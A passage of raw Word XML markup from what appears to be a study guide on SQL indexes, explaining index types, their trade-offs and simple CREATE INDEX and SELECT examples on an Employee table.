          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> clauses, where searching for rows based on specific conditions is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA4087" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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How It Works</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A44C6" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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The database creates an index on a specified column or set of columns. The index contains a sorted list of values for the indexed column(s), along with pointers to the actual rows in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD2F95" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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When a query is run, the database uses the index to locate the rows without scanning the entire table, improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A071DD3" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Types of Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10186C" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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lastRenderedPageBreak/>
        <w:t>Primary Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Automatically created when you define a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PRIMARY KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> constraint. It ensures unique values and helps with data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85A8DF" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Created automatically when you define a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> constraint, ensuring that no two rows have the same value for the indexed column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC5159" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Non-Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Created on any column to speed up query performance, even if duplicate values exist in the column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B9911B" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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omposite Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Created on multiple columns (instead of just one) to optimize queries involving multiple columns in the WHERE clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700A77A" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Full-Text Index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for full-text searches to speed up searches for words in text-based columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F25D806" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DD3CD0" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Faster Query Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Especially for SELECT queries with conditions on the indexed columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772E136" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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fficient Sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When sorting or ordering rows (ORDER BY), indexes help by avoiding full table scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36B2F4" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Uniqueness</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that values in certain columns remain unique (if the index is created with a UNIQUE constraint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C086B" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5BB92E" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Performance Overhead on Data Modification</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes can slow down INSERT, UPDATE, and DELETE operations because the index must also be updated whenever the table data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDBD80E" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Storage Space</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Indexes consume additional disk space, and the more indexes you have, the more storage space is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC495C" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Example of Creating an Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419711B5" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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INDEX idx_employee_name ON Employee (emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F2AF0" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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This creates an index named idx_employee_name on the emp_name column of the Employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6F1F64" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Example of a Composite Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28140FE1" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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INDEX idx_employee_name_salary ON Employee (emp_name, emp_salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B1E855" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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This creates an index on both the emp_name and emp_salary columns, which will be useful when queries involve conditions on both columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582AC431" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Example of Using Index in a Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB5784B" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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f you have an index on the emp_name column in the Employee table, the database will use that index to quickly locate rows where the employee's name is "John":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4D60B" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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ELECT * FROM Employee WHERE emp_name = 'John';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F246D7E" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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If there's no index, the database will perform a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full table scan</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is slower for large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23893A3D" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628C0A3A" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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An </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a performance optimization tool used to speed up data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31714BA2" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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It improves </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but can slow down </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and increase storage requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F434A" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="00CE4B95" w:rsidRDefault="00925485" w:rsidP="0085313D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It is essential to balance the number and type of indexes in a database to optimize both query performance and data manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC9CEA" w14:textId="5851F26F" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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58C096A">
          <v:rect id="_x0000_i3003" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105AA44" w14:textId="45D3FB33" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="00674FF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="723" w:name="_Toc196308203"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain different types of </w:t>
      </w:r>
      <w:r w:rsidR="00925485" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ndex</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="723"/>
    </w:p>
    <w:p w14:paraId="55937206" w14:textId="6F2F526D" w:rsidR="0049473E" w:rsidRPr="0085313D" w:rsidRDefault="0049473E" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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There are several types of indexes in SQL, each serving a specific purpose to improve query performance and optimize data retrieval. Here's a detailed explanation of the most common types of indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A3D5A"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1. Primary Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16607220"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A primary index is automatically created when you define a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PRIMARY KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> constraint on a table. It enforces uniqueness on the indexed column(s) and ensures that no two rows in the table have the same value for the indexed column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D06F398"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBBCA03"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Unique values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6541ACFB"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Automatically created for the primary key column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395F57F"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an only have one primary index per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7DA95"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t also implies a unique constraint on the column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218970FB"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C00169"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TABLE Employee (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102E3C6"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  emp_id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8F978"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  emp_name VARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B768ED"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31414183"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2. Unique Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B0A45"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lastRenderedPageBreak/>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A unique index ensures that all values in the indexed column(s) are unique, i.e., no two rows can have the same value in the indexed column(s). Unlike the primary index, you can create multiple unique indexes on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45BE14"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499C3E7"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Ensures uniqueness of values in one or more columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD6F6D"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Can be created explicitly or automatically when a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> constraint is applied to a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA881D7"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89D565"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UNIQUE INDEX idx_employee_email ON Employee (emp_email);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCC57B0"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3. Non-Unique Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294CC62B"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A non-unique index allows duplicate values in the indexed column(s). It is used to speed up query performance when you frequently query a column that contains repeated values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B2130"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014DF71"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Doesn't enforce uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCC3F2"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Helps to speed up SELECT queries involving the indexed column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598614B5"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D55A98"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INDEX idx_employee_name ON Employee (emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F012FD8"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4. Composite (Multi-Column) Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9534E8"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A composite index is an index that is created on two or more columns of a table. It is used when queries frequently involve conditions on multiple columns in the WHERE clause or in JOIN conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B6E09"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15595399"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overs multiple columns in a single index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8BFAB"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Effective when queries filter or sort based on multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DC79B"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The order of the columns in the composite index matters, as the index will be optimized based on that order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF5FE6"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FEC52E"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INDEX idx_employee_name_salary ON Employee (emp_name, emp_salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF729F"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5. Unique Composite Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CE973"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
